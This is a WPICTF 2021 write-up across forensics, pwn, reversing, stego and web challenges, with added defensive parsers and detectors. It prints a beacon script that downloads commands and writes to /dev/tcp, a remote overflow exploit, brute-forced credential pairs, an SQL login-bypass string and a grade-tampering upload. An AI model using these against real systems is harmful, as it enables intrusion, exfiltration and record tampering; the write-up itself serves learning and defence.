WPICTF 2021
forensics
DFIR
Solved by : thewhiteh4t
- we get a `.ova` file for this one
- challenge states that activity was detected in `/` directory
- in `/` directory we can see a `.pot` file
- this file contains :

```
$6$fZ/iAgR.$FHl9m/ibTVBQ3OQ645IiLtrcxSsxdt8pTQHh7knfQ2GhD7Pbu0Dv0evXaGnnMVjV7xe5KlRprL5hWEjE6/Ruj0:toor
```
- looks like shadow file format so I tried to login as `root` with `toor` as password and it works!
- in `/root` we can see some interesting dot files
- `payload.sh` pulls an encrypted csv file from gitlab and decrypts it
```bash
#!/bin/bash
W=$((15*60))   # beacon interval: 15 minutes
K=120          # single-byte XOR key
while true
do
    echo "sleeping for $W seconds"
    sleep $W
    rm .encrypted_csv.data
    wget https://gitlab.com/thehacker1/payload/-/raw/master/.encrypted_csv.data
    echo "downloaded file"
    F="./.encrypted_csv.data"
    # XOR every byte of the download with K and append the result to encrypted.csv
    hexdump -v -e '/1 "%u\n"' $F | while read B; do
        E=$((K^B))
        C=$(printf \\$(printf '%03o' $E))
        echo -n $C >> encrypted.csv
    done
    echo "decrypted newest command"
    S=$(cat encrypted.csv)
    rm encrypted.csv
    S="${S::-1}"          # drop the trailing character
    D=,
    S=$S$D
    array=();
    # split the decoded line on commas into message, host and port
    while [[ $S ]]; do
        array+=( "${S%%"$D"*}" );
        S=${S#*"$D"};
    done;
    declare -a array
    M=${array[0]}
    I=${array[1]}
    P=${array[2]}
    M=${M##WPI}           # strip a leading "WPI" from the message
    echo "routing message to $I:$P"
    echo "$M" > /dev/tcp/$I/$P
done
```
- I modified the script to not remove the new file by commenting out line 19 (`rm encrypted.csv`)
- `encrypted.csv` holds our flag!
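Instead of letting the beacon script run and commenting out its `rm`, the dropped file can be decoded offline. The following is an added example (not part of the writeup) that mirrors what `payload.sh` does in Python: XOR every byte with the key `K=120`, drop the trailing character, split on commas, and strip the leading `WPI`. It also shows a known-plaintext recovery of the key for the case where the script constant is not at hand. The sample blob, the host `192.0.2.10` and the port are constructed, not challenge data.

```python
import ipaddress

KEY = 120  # the single-byte XOR key from payload.sh (K=120)

# Constructed sample of what the dropped .encrypted_csv.data could look like:
# a "message,host,port" line XORed byte-wise with KEY. Not real challenge data.
PLAINTEXT = b"WPI{constructed_example},192.0.2.10,4444\n"
SAMPLE_BLOB = bytes(b ^ KEY for b in PLAINTEXT)


def xor_decode(blob, key=KEY):
    """Undo the hexdump/printf loop of the script: XOR each byte with the key."""
    return bytes(b ^ key for b in blob)


def parse_command(blob, key=KEY):
    """Mirror the script's parsing and return (message, host, port).

    The script does S="${S::-1}" (drop the last character), splits on ","
    and removes a leading "WPI" from the first field with ${M##WPI}.
    """
    text = xor_decode(blob, key).decode("utf-8", "replace")[:-1]
    fields = text.split(",")
    if len(fields) < 3:
        raise ValueError("expected message,host,port")
    message, host, port = fields[0], fields[1], fields[2]
    if message.startswith("WPI"):
        message = message[3:]
    ipaddress.ip_address(host)  # sanity-check the C2 host before recording it as an IoC
    return message, host, int(port)


def guess_key(blob, known_prefix=b"WPI"):
    """Known-plaintext recovery: which single-byte keys turn the start of the blob into known_prefix."""
    n = len(known_prefix)
    return [k for k in range(256) if bytes(b ^ k for b in blob[:n]) == known_prefix]


if __name__ == "__main__":
    print(parse_command(SAMPLE_BLOB))
    print(guess_key(SAMPLE_BLOB))
```

Run against the real `.encrypted_csv.data`, `parse_command` gives the message plus the host and port the beacon would have connected to, which is the indicator worth recording from this image.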
Holmes:
Solved by : Starry-Lord
- the challenge gives us the following string : `Z29vZCB0aG91Z2h0LCBidXQgbm8u`
- it looks like base64, however a base64 decoder shows the following: `good thought, but no.`
- using the `Sherlock` OSINT tool we found this github repository : https://github.com/Z29vZCB0aG91Z2h0LCBidXQgbm8u/flag/blob/main/README.md

WPI{sh3rlock_holmes_w0uld_be_pr0ud}
misc
Pokemon
solved by : chronocruz.exe
- Using gbgw64 Gameboy emulator
- Load up the provided pokemon ROM
- Start the game
- Continue to tall grasses towards north after exiting your house
- Professor Oak will stop you saying it’s dangerous to go without a pokemon
- Then he will take you to his lab and give a choice between three pokeballs
  - Left most = Charmander
  - Middle = Squirtle
  - Right most = Bulbasaur
  - (Not that these choices matter anyway)
- Soon as you pick your pokemon your rival will choose his pokeball and no matter which one he chooses he will get a Mewtwo, which is basically the strongest pokemon in this game. And it is level 50 to further salt your wounds.
- Simple way to win, find the cheat menu within your gameboy emulator
  - (In gbgw64 you just right click and there it is)
- Add the following codes
  - `01FF16D0` - Unlimited HP so you don’t die
  - `0170E9CF` - Enemy can’t attack and is hurt every turn with a burn status effect
- Patiently keep attacking your enemy till his health drops to zero and you get the following screen.
- Congratulations, you’re the best pokemon trainer (not really).
Cast_Away
solved by : chronocruz.exe
- We are provided with Minecraft world data.
- Extract the files and now we need a tool called NBT Explorer which can be used to read Minecraft’s proprietary Named Binary Tag (NBT) file format.
- Now the description says three players ran off with the flag.
- So the flag must be split between the three players.
- Opening the first file in playerdata folder we get
- Further expanding and studying the tree we find
- The value of EnderItems > tag > display > Name seems to be the end part of a flag. Note this value down.
- Repeating the process for the next playerdata file
- This time we find a flag like string in Inventory > tag > pages
- For the third playerdata however :
  - There was no relevant information directly visible in the data.
  - Looking at the coordinates of the player we find
  - Using the Search > Chunk Finder function
  - We input X and Z coordinates but I was unable to find the exact chunk/block values.
- Moving onto a second tool called Universal Minecraft Editor which is a wonderful tool available for free at https://www.universalminecrafteditor.com/
- We load the minecraft world data into this tool and using the chunk locator input X and Z coordinates
- We see there is a sign post within the chunk we located.
- Opening this chunk reveals the in-game objects within this region and their attributes
- We clearly see the value of Text2 looks like the beginning of our string
- Concatenating the three parts we get the full string that is our flag

WPI{zaQa4ttIyNo}
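The two GUI tools above do three things that are easy to script: decompress and parse the NBT in a `playerdata` file, list every string in the tree (so a flag fragment hidden under an unusual path is not missed), and turn the player's `Pos` into chunk and region coordinates. The following is an added example, not code from the writeup or from either tool; it is a minimal NBT reader written from the public format (big-endian, named tags, `TAG_End` closing compounds). The sample blob is constructed in the block with a tiny encoder and mirrors the `EnderItems > tag > display > Name` path; the string it carries is made up.

```python
import gzip
import math
import struct

# --- tiny encoder, used only to build the constructed sample below ---
def _named(tag_type, name, payload):
    return bytes([tag_type]) + struct.pack(">H", len(name)) + name.encode() + payload

def _string(s):
    return struct.pack(">H", len(s.encode())) + s.encode()

def _compound(*children):
    return b"".join(children) + b"\x00"          # TAG_End closes a compound

def _list(elem_type, *payloads):
    return bytes([elem_type]) + struct.pack(">i", len(payloads)) + b"".join(payloads)

# Constructed playerdata-style blob (not challenge data).
SAMPLE_NBT = _named(10, "", _compound(
    _named(3, "DataVersion", struct.pack(">i", 2586)),
    _named(9, "Pos", _list(6, *(struct.pack(">d", v) for v in (12.5, 64.0, -30.25)))),
    _named(9, "EnderItems", _list(10, _compound(
        _named(8, "id", _string("minecraft:paper")),
        _named(10, "tag", _compound(
            _named(10, "display", _compound(
                _named(8, "Name", _string('{"text":"constructed_end}"}'))))))))),
))

_FIXED = {1: ">b", 2: ">h", 3: ">i", 4: ">q", 5: ">f", 6: ">d"}
_ARRAYS = {7: ">b", 11: ">i", 12: ">q"}

def _read(tag_type, data, pos):
    """Decode one payload of tag_type at pos; return (value, next_pos)."""
    if tag_type in _FIXED:
        fmt = _FIXED[tag_type]
        return struct.unpack_from(fmt, data, pos)[0], pos + struct.calcsize(fmt)
    if tag_type == 8:                                   # TAG_String: u16 length + bytes
        n = struct.unpack_from(">H", data, pos)[0]
        return data[pos + 2:pos + 2 + n].decode("utf-8", "replace"), pos + 2 + n
    if tag_type in _ARRAYS:                             # byte / int / long arrays
        fmt, n = _ARRAYS[tag_type], struct.unpack_from(">i", data, pos)[0]
        size = struct.calcsize(fmt)
        vals = [struct.unpack_from(fmt, data, pos + 4 + i * size)[0] for i in range(n)]
        return vals, pos + 4 + n * size
    if tag_type == 9:                                   # TAG_List: element type + i32 count
        elem_type, n = data[pos], struct.unpack_from(">i", data, pos + 1)[0]
        pos, items = pos + 5, []
        for _ in range(n):
            v, pos = _read(elem_type, data, pos)
            items.append(v)
        return items, pos
    if tag_type == 10:                                  # TAG_Compound: named tags until TAG_End
        out = {}
        while data[pos] != 0:
            t, n = data[pos], struct.unpack_from(">H", data, pos + 1)[0]
            name = data[pos + 3:pos + 3 + n].decode("utf-8", "replace")
            out[name], pos = _read(t, data, pos + 3 + n)
        return out, pos + 1
    raise ValueError(f"unknown NBT tag type {tag_type}")

def parse_nbt(data):
    """Parse a playerdata-style NBT blob (gzip-compressed or raw) into Python objects."""
    if data[:2] == b"\x1f\x8b":
        data = gzip.decompress(data)
    if data[0] != 10:
        raise ValueError("root tag is not a compound")
    name_len = struct.unpack_from(">H", data, 1)[0]
    root, _ = _read(10, data, 3 + name_len)
    return root

def find_strings(tree, path=()):
    """Yield (path, value) for every TAG_String so unusual strings can be grepped for."""
    if isinstance(tree, dict):
        for k, v in tree.items():
            yield from find_strings(v, path + (k,))
    elif isinstance(tree, list):
        for i, v in enumerate(tree):
            yield from find_strings(v, path + (i,))
    elif isinstance(tree, str):
        yield path, tree

def chunk_and_region(pos):
    """Block position -> ((chunk x, chunk z), (region x, region z)): 16 blocks per chunk, 32 chunks per region."""
    cx, cz = math.floor(pos[0]) >> 4, math.floor(pos[2]) >> 4
    return (cx, cz), (cx >> 5, cz >> 5)

if __name__ == "__main__":
    tree = parse_nbt(SAMPLE_NBT)
    for path, s in find_strings(tree):
        print("/".join(map(str, path)), "=", s)
    print(chunk_and_region(tree["Pos"]))
```

On a real `playerdata/<uuid>.dat` (gzip-compressed) the same `parse_nbt` call applies; the region tuple names the `r.<x>.<z>.mca` file in which the chunk from the third player's position lives.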
pwn
$m4$h
Solved by : thewhiteh4t
```python
#!/usr/bin/env python3
from pwn import *

host = 'smash184384.wpictf.xyz'
port = 15724

junk = 'A' * 11                          # 11 bytes of padding before the 32-bit value
num = 923992130
le_num = p32(num, endianness='little')   # pack the value as 32-bit little-endian
buffer = junk.encode() + le_num + '\n'.encode()

conn = remote(host, port)
conn.send(buffer)
flag = conn.recvline().decode().split(': ')[1].strip()
print(f'\nFLAG : {flag}\n')
conn.close()
```
re
Baby’s First Reversing
Solved By : thewhiteh4t
- we have a python bytecode file
- we can de-compile it using `uncompyle6`
- here is the resultant python script
```python
def __main__(inp):
    i = -4
    for c in inp:
        if i == 4:
            if c != ' ':
                exit(82)
        else:
            if i == -4:
                if c != 'W':
                    exit(133)
            else:
                if i == -2:
                    if c != 'I':
                        exit(42069)
                elif i == -1 and c != '{':
                    exit(11037)
        if i == 10:
            if c != '}':
                exit(9001)
        else:
            if i == 1:
                if c != '@':
                    exit(11037)
            if i == 2 and c != '5':
                exit(11037)
            if i == 7 and c != 'P':
                exit(11037)
            if i == 3:
                if c != 'E':
                    exit(11037)
            else:
                if i == 0:
                    if c != 'h':
                        exit(82)
                if i == 5 and c != 'h':
                    exit(11037)
                if i == -3 and c != 'P':
                    exit(133)
                if i == 9:
                    if c != '!':
                        exit(133)
                else:
                    if i == 6:
                        if c != '0':
                            exit(133)
                    if i == 8 and c != '3':
                        exit(133)
        i += 1
    else:
        print(':)')


__main__(input('hi'))
```
- if we carefully observe we can see a pattern
- it is checking the value of `i` and `c`
- if the condition is not satisfied the program exits with an exit code

```python
if i == -4:
    if c != 'W':
        exit(133)
```

- if we look at the values of `i` and `c` we can see another pattern

```
i == -4 -> c = W
i == -3 -> c = P
i == -2 -> c = I
i == -1 -> c = {
i ==  0 -> c = h
i ==  1 -> c = @
i ==  2 -> c = 5
i ==  3 -> c = E
i ==  4 -> c = SPACE
i ==  5 -> c = h
i ==  6 -> c = 0
i ==  7 -> c = P
i ==  8 -> c = 3
i ==  9 -> c = !
i == 10 -> c = }
```

WPI{h@5E h0P3!}
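The table above was built by hand. For a longer or more tangled checker the same pairs can be pulled out mechanically by walking the decompiled source with Python's `ast` module: every `if` that tests `i == N` fixes the index for the checks nested inside it, and every `c != X` (alone or combined with `and`) records that index `N` must hold `X`. The following is an added example, not part of the writeup; `SAMPLE` is a constructed miniature in the same nested style, and pasting the decompiled `__main__` (without the trailing `__main__(input('hi'))` call) into `source` yields the full table shown above.

```python
import ast

# Constructed checker in the same shape as the decompiled one (not the challenge code).
SAMPLE = '''
def check(inp):
    i = -2
    for c in inp:
        if i == 0:
            if c != '{':
                exit(1)
        else:
            if i == -2:
                if c != 'A':
                    exit(2)
            elif i == -1 and c != 'B':
                exit(3)
        if i == 2 and c != '}':
            exit(4)
        if i == 1:
            if c != 'x':
                exit(5)
        i += 1
    else:
        print(':)')
'''


def _match(test, var, op):
    """Return the literal X when `test` is `<var> <op> X`, else None."""
    if (isinstance(test, ast.Compare) and isinstance(test.left, ast.Name)
            and test.left.id == var and len(test.ops) == 1 and isinstance(test.ops[0], op)):
        return ast.literal_eval(test.comparators[0])
    return None


def collect_constraints(source):
    """Map index -> required character by walking every `if` in the source."""
    found = {}

    def visit(stmts, current_i):
        for node in stmts:
            if isinstance(node, ast.If):
                parts = node.test.values if isinstance(node.test, ast.BoolOp) else [node.test]
                i_val = next((v for v in (_match(p, "i", ast.Eq) for p in parts) if v is not None), None)
                c_val = next((v for v in (_match(p, "c", ast.NotEq) for p in parts) if v is not None), None)
                idx = i_val if i_val is not None else current_i
                if c_val is not None and idx is not None:
                    found[idx] = c_val            # this branch exits unless c == c_val at index idx
                visit(node.body, idx)
                visit(node.orelse, current_i)     # the else branch no longer knows i's value
            elif hasattr(node, "body"):           # for / while / def / with: descend
                visit(node.body, current_i)
                visit(getattr(node, "orelse", []), current_i)

    visit(ast.parse(source).body, None)
    return found


def recover_input(source):
    """Assemble the accepted string; '?' marks indices the checker never constrains."""
    found = collect_constraints(source)
    lo, hi = min(found), max(found)
    missing = [k for k in range(lo, hi + 1) if k not in found]
    return "".join(found.get(k, "?") for k in range(lo, hi + 1)), missing


if __name__ == "__main__":
    print(recover_input(SAMPLE))
```

The walker is static: it never runs the checker, so the `exit()` calls are harmless, and unconstrained positions surface as `?` rather than being guessed.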
stego
Glute
Solved by : Ava
- we have a PNG image
- running `foremost` reveals JPG and PDF files inside it

```
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Sat Apr 24 21:28:46 2021
Invocation: foremost glute.png
Output directory: /home/twh/ctf/wpictf/glute/output
Configuration file: /etc/foremost.conf
------------------------------------------------------------------
File: glute.png
Start: Sat Apr 24 21:28:46 2021
Length: 335 KB (343136 bytes)

Num  Name (bs=512)   Size    File Offset  Comment
0:   00000564.jpg    19 KB   288793
1:   00000000.png    335 KB  0            (699 x 699)
2:   00000557.pdf    55 KB   285674

Finish: Sat Apr 24 21:28:46 2021

3 FILES EXTRACTED

jpg:= 1
png:= 1
pdf:= 1
------------------------------------------------------------------
```

- PDF contains our flag

WPI{P0lyGlOtz_R_koo1}
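The foremost audit shows why the file is a polyglot: the PNG is valid, and the PDF and JPG simply sit after the PNG's `IEND` chunk, where image decoders stop reading. The following is an added example, not part of the writeup, that reproduces the two checks a file-upload filter or triage script would want: carve for known magic bytes the way foremost does, and walk the PNG chunk list to measure how much data trails `IEND`. The polyglot it inspects is constructed inline (a real 1x1 PNG followed by fake PDF and JPEG bytes), not the challenge file.

```python
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SIGNATURES = {PNG_MAGIC: "png", b"\xff\xd8\xff": "jpg", b"%PDF-": "pdf"}


def _chunk(ctype, body):
    """PNG chunk: length, type, data, CRC32 over type+data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


# Constructed polyglot (not the challenge file): a valid 1x1 PNG, then PDF and JPEG
# bytes appended after IEND, which PNG decoders silently ignore.
TINY_PNG = (PNG_MAGIC
            + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
            + _chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00"))
            + _chunk(b"IEND", b""))
FAKE_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"
FAKE_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + b"\xff\xd9"
POLYGLOT = TINY_PNG + FAKE_PDF + FAKE_JPG


def find_signatures(data):
    """Every offset where a known magic appears, like foremost's carving pass."""
    hits = []
    for magic, kind in SIGNATURES.items():
        start = 0
        while True:
            off = data.find(magic, start)
            if off == -1:
                break
            hits.append((off, kind))
            start = off + 1
    return sorted(hits)


def png_end_offset(data):
    """Walk the chunk list; return the offset just past IEND's CRC, or None if malformed."""
    if not data.startswith(PNG_MAGIC):
        return None
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        if pos + 12 + length > len(data):
            return None
        stored_crc = struct.unpack_from(">I", data, pos + 8 + length)[0]
        if zlib.crc32(data[pos + 4:pos + 8 + length]) != stored_crc:
            return None
        pos += 12 + length
        if ctype == b"IEND":
            return pos
    return None


def trailing_bytes(data):
    """Bytes after IEND: a non-empty result is the simplest polyglot indicator."""
    end = png_end_offset(data)
    return b"" if end is None else data[end:]


def describe(data):
    return {"signatures": find_signatures(data), "trailing_len": len(trailing_bytes(data))}


if __name__ == "__main__":
    print(describe(POLYGLOT))
```

`describe(open("glute.png", "rb").read())` reports the same PDF and JPG offsets foremost found plus the number of bytes after `IEND`; an upload handler that re-encodes images, or rejects files with trailing data, removes this hiding place.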
Suspicious traffic
Solved by : thewhiteh4t
- we are given a pcapng file with some HTTP traffic
- some of the requests have extra characters in the data field
- they can be listed easily using tshark

```bash
tshark -r capture.pcapng -T fields -e http.file_data | grep "\S" | grep -v "html" | cut -d "\\" -f 1 | tr -d "\n"
```

WPI{su3p1ci0uS_htTp}
web
wpi admin
Solved by : thewhiteh4t
- email of our friend : alexo@uupeye.edu
- “students” here have some “bad” passwords
- emails of students are visible on : https://wpiadmin.wpictf.xyz/topStudents
- so we get a list of emails which we can bruteforce on student login!

```
colino@uupeye.edu
calliep@uupeye.edu
annar@uupeye.edu
gaylenek@uupeye.edu
dennisb@uupeye.edu
sherrim@uupeye.edu
adams@uupeye.edu
```

- after bruteforcing we get all these credentials

```
colino@uupeye.edu:123456
calliep@uupeye.edu:password
annar@uupeye.edu:iloveyou
gaylenek@uupeye.edu:qwerty
dennisb@uupeye.edu:123123
sherrim@uupeye.edu:12345678
adams@uupeye.edu:soccer
```

- after checking each profile we get the flag on `dennisb@uupeye.edu`
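Guessing passwords for a published list of accounts leaves a distinctive trace in the login log: one source, many failures in a short window, several different usernames, and then a success. The following is an added example (not part of the writeup) of detection logic for exactly that pattern, run over a constructed application login log; the log format (`src=`, `user=`, `result=`) and the addresses are assumptions made for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed application login log (not from the challenge): one client walks a list
# of student e-mails with guesses until one succeeds; a second client mistypes once.
SAMPLE_LOG = """\
2021-04-25T10:00:01Z src=10.0.0.5 user=colino@uupeye.edu result=fail
2021-04-25T10:00:02Z src=10.0.0.5 user=colino@uupeye.edu result=fail
2021-04-25T10:00:03Z src=10.0.0.5 user=calliep@uupeye.edu result=fail
2021-04-25T10:00:04Z src=10.0.0.5 user=annar@uupeye.edu result=fail
2021-04-25T10:00:05Z src=10.0.0.5 user=dennisb@uupeye.edu result=fail
2021-04-25T10:00:06Z src=10.0.0.5 user=dennisb@uupeye.edu result=ok
2021-04-25T10:05:00Z src=192.0.2.9 user=adams@uupeye.edu result=fail
2021-04-25T10:06:00Z src=192.0.2.9 user=adams@uupeye.edu result=ok
"""

LINE_RE = re.compile(r"^(\S+) src=(\S+) user=(\S+) result=(\w+)$")


def parse_events(lines):
    """Yield (timestamp, src, user, success) for lines matching the assumed log format."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m.group(2), m.group(3), m.group(4) == "ok"


def summarize_logins(lines, window=timedelta(minutes=5)):
    """Per source: peak failures inside a sliding window, distinct accounts tried,
    and whether a success followed failures (a guessed credential)."""
    recent = defaultdict(deque)      # src -> timestamps of failures still inside the window
    users = defaultdict(set)
    stats = {}
    for ts, src, user, ok in sorted(parse_events(lines)):
        q = recent[src]
        while q and ts - q[0] > window:
            q.popleft()
        s = stats.setdefault(src, {"max_failures_in_window": 0, "distinct_users": 0,
                                   "success_after_failures": False})
        if ok:
            s["success_after_failures"] = s["success_after_failures"] or bool(q)
            continue
        q.append(ts)
        users[src].add(user)
        s["max_failures_in_window"] = max(s["max_failures_in_window"], len(q))
        s["distinct_users"] = len(users[src])
    return stats


def flag_sources(lines, max_failures=4, min_users=3, **kw):
    """Sources that either exceed the failure threshold or spray across many accounts."""
    return sorted(src for src, s in summarize_logins(lines, **kw).items()
                  if s["max_failures_in_window"] >= max_failures or s["distinct_users"] >= min_users)


if __name__ == "__main__":
    for src, s in summarize_logins(SAMPLE_LOG.splitlines()).items():
        print(src, s)
    print("flagged:", flag_sources(SAMPLE_LOG.splitlines()))
```

The `distinct_users` counter is what separates a spray over a public e-mail list from a single user who forgot a password; the `success_after_failures` flag is the event to alert on, since it marks an account that is now in someone else's hands.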
wpi admin 2
Solved by : thewhiteh4t
- we login as dennisb@uupeye.edu again
- In student communication we get the link to the admin portal : https://wpiadmin.wpictf.xyz/iyghfihGBKHJF9719fn113
- Bruteforcing did not work so I tried SQL login bypass using burpsuite

```
admin@uupeye.edu' or '1'='1
```

- Bypass is successful and we get the link for the admin portal!
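The bypass works because the login query is assembled from the submitted strings, so the quote in the e-mail field ends the literal and the `or '1'='1` becomes part of the `WHERE` clause. The following is an added example, not the challenge's code, showing the two forms side by side against an in-memory SQLite table: a string-built query that the payload from the writeup satisfies, and a parameterized lookup that treats the same input as an ordinary (non-existent) e-mail. The user row, salt and password are constructed.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-salt"      # a real system uses a random per-user salt
PAYLOAD = "admin@uupeye.edu' or '1'='1"   # the bypass string from the writeup


def _hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()


def make_db():
    """Constructed in-memory user table (not the challenge's database)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin@uupeye.edu", _hash("constructed-admin-pw")))
    return db


def login_vulnerable(db, email, password):
    """String-built query: quotes inside `email` become SQL.

    With PAYLOAD the WHERE clause reads
      email = 'admin@uupeye.edu' or '1'='1' AND pw_hash = '...'
    and, since AND binds tighter than OR, the admin row matches regardless of the hash.
    """
    sql = (f"SELECT email FROM users WHERE email = '{email}' "
           f"AND pw_hash = '{_hash(password)}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, email, password):
    """Parameterized lookup by e-mail only, then a constant-time hash comparison in code."""
    row = db.execute("SELECT pw_hash FROM users WHERE email = ?", (email,)).fetchone()
    if row is None or not hmac.compare_digest(row[0], _hash(password)):
        return None
    return email


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    print("safe:      ", login_safe(db, PAYLOAD, "anything"))
```

The fix is not escaping the quote but never letting user input reach the query text: the parameter is bound as a value, so `' or '1'='1` is looked up literally as part of an e-mail address and no row matches.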
wpi admin 3
Solved by : thewhiteh4t
- We now have access to the admin panel and we have to change grades of our friend
- challenge states that we need to add grades for 4 semesters
- grades are uploaded using a json file
- on inspecting the page source we can see a link for an example json file
- by adding two more semesters and changing `production` to true we can upload grades successfully, here is the json I used :
```json
{
  "configName": "Example",
  "timezone": "EST",
  "production": true,
  "studentData": [
    {
      "name": "Alexo O",
      "email": "alexo@uupeye.edu",
      "id": 123456,
      "major": "Computer Science",
      "class": 2023,
      "workerStatus": false,
      "grades": [
        {
          "year": 2019,
          "semester": "fall",
          "semesterGPA": 4.00,
          "courses": [
            { "name": "Calculus 1", "code": "MA1021", "points": 3, "grade": "A" },
            { "name": "Introduction to Program Design", "code": "CS1101", "points": 3, "grade": "A" },
            { "name": "Elements of Writing", "code": "WR1010", "points": 3, "grade": "A" },
            { "name": "Calculus 2", "code": "MA1022", "points": 3, "grade": "A" },
            { "name": "Accelerated Object-Oriented Design Concepts", "code": "CS2103", "points": 3, "grade": "A" },
            { "name": "Writing about Science and Technology", "code": "WR1011", "points": 3, "grade": "A" }
          ]
        },
        {
          "year": 2019,
          "semester": "spring",
          "semesterGPA": 4.00,
          "courses": [
            { "name": "Calculus 3", "code": "MA1023", "points": 3, "grade": "A" },
            { "name": "Calculus 4", "code": "MA1024", "points": 3, "grade": "A" },
            { "name": "Systems Programming Concepts", "code": "CS2303", "points": 3, "grade": "A" },
            { "name": "Algorithms", "code": "CS2223", "points": 3, "grade": "A" },
            { "name": "General Physics-mechanics", "code": "PH1110", "points": 3, "grade": "A" },
            { "name": "General Physics-electricity and Magnetism", "code": "PH1120", "points": 3, "grade": "A" }
          ]
        },
        {
          "year": 2020,
          "semester": "spring",
          "semesterGPA": 4.00,
          "courses": [
            { "name": "Calculus 3", "code": "MA1023", "points": 3, "grade": "A" },
            { "name": "Calculus 4", "code": "MA1024", "points": 3, "grade": "A" },
            { "name": "Systems Programming Concepts", "code": "CS2303", "points": 3, "grade": "A" },
            { "name": "Algorithms", "code": "CS2223", "points": 3, "grade": "A" },
            { "name": "General Physics-mechanics", "code": "PH1110", "points": 3, "grade": "A" },
            { "name": "General Physics-electricity and Magnetism", "code": "PH1120", "points": 3, "grade": "A" }
          ]
        },
        {
          "year": 2020,
          "semester": "summer",
          "semesterGPA": 4.00,
          "courses": [
            { "name": "Calculus 3", "code": "MA1023", "points": 3, "grade": "A" },
            { "name": "Calculus 4", "code": "MA1024", "points": 3, "grade": "A" },
            { "name": "Systems Programming Concepts", "code": "CS2303", "points": 3, "grade": "A" },
            { "name": "Algorithms", "code": "CS2223", "points": 3, "grade": "A" },
            { "name": "General Physics-mechanics", "code": "PH1110", "points": 3, "grade": "A" },
            { "name": "General Physics-electricity and Magnetism", "code": "PH1120", "points": 3, "grade": "A" }
          ]
        }
      ]
    }
  ]
}
```
- after uploading it we get the flag!
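The upload succeeds because the server trusts whatever the JSON says: a client-controlled `production` flag, a self-reported `semesterGPA`, and an `email` that names the student to be graded. The following is an added example (not the challenge's code) of the server-side validation that would have caught each of those: it rejects unknown top-level keys such as `production`, binds the document to the authenticated student rather than the e-mail in the file, requires the stated number of semesters, and recomputes each `semesterGPA` from the listed courses. The documents it checks are built in the block in the same shape as the writeup's JSON (one course per semester); the 4.0 grade scale is an assumption.

```python
GRADE_POINTS = {"A": 4.0, "B": 3.0, "C": 2.0, "D": 1.0, "F": 0.0}   # assumed 4.0 scale
ALLOWED_TOP = {"configName", "timezone", "studentData"}              # no client-controlled "production"
ALLOWED_SEMESTERS = {"fall", "spring", "summer"}
TERMS = [(2019, "fall"), (2019, "spring"), (2020, "spring"), (2020, "summer")]  # as in the writeup's JSON


def _semester(year, term, grade):
    """One semester in the writeup's shape, trimmed to a single course (constructed)."""
    return {"year": year, "semester": term, "semesterGPA": GRADE_POINTS[grade],
            "courses": [{"name": "Calculus 1", "code": "MA1021", "points": 3, "grade": grade}]}


def build_upload(n_semesters=4, include_production=False, grade="A"):
    """Constructed upload document shaped like the one in the writeup."""
    doc = {"configName": "Example", "timezone": "EST",
           "studentData": [{"name": "Alexo O", "email": "alexo@uupeye.edu", "id": 123456,
                            "grades": [_semester(y, t, grade) for y, t in TERMS[:n_semesters]]}]}
    if include_production:
        doc["production"] = True
    return doc


def semester_gpa(courses):
    """Credit-weighted GPA recomputed from the courses, never taken from the document."""
    total = sum(c["points"] for c in courses)
    if total == 0:
        return 0.0
    return round(sum(GRADE_POINTS[c["grade"]] * c["points"] for c in courses) / total, 2)


def validate_upload(doc, expected_email, required_semesters=4):
    """Server-side checks; returns a list of problems (empty means accept)."""
    if not isinstance(doc, dict):
        return ["top level must be an object"]
    problems = []
    extra = set(doc) - ALLOWED_TOP
    if extra:
        problems.append(f"unexpected top-level keys: {sorted(extra)}")
    students = doc.get("studentData")
    if not isinstance(students, list) or len(students) != 1:
        return problems + ["studentData must contain exactly one student"]
    student = students[0]
    if student.get("email") != expected_email:   # bind to the authenticated session, not the file
        problems.append("email does not match the authenticated student")
    grades = student.get("grades") or []
    if len(grades) < required_semesters:
        problems.append(f"expected {required_semesters} semesters, got {len(grades)}")
    seen = set()
    for g in grades:
        key = (g.get("year"), g.get("semester"))
        if key[1] not in ALLOWED_SEMESTERS or key in seen:
            problems.append(f"bad or duplicate semester {key}")
        seen.add(key)
        courses = g.get("courses") or []
        if not courses or any(c.get("grade") not in GRADE_POINTS
                              or not isinstance(c.get("points"), int) for c in courses):
            problems.append(f"semester {key}: missing or invalid courses")
            continue
        claimed = g.get("semesterGPA")
        if not isinstance(claimed, (int, float)) or abs(claimed - semester_gpa(courses)) > 0.005:
            problems.append(f"semester {key}: semesterGPA {claimed} does not match the listed grades")
    return problems


if __name__ == "__main__":
    print(validate_upload(build_upload(n_semesters=2, include_production=True), "alexo@uupeye.edu"))
    print(validate_upload(build_upload(), "alexo@uupeye.edu"))
```

Whether an upload is "production" is a property of the deployment, not of the request, so the validator has no way to accept that key at all; likewise the student being graded comes from the session, which is what stops an attacker who reached the panel from choosing the target.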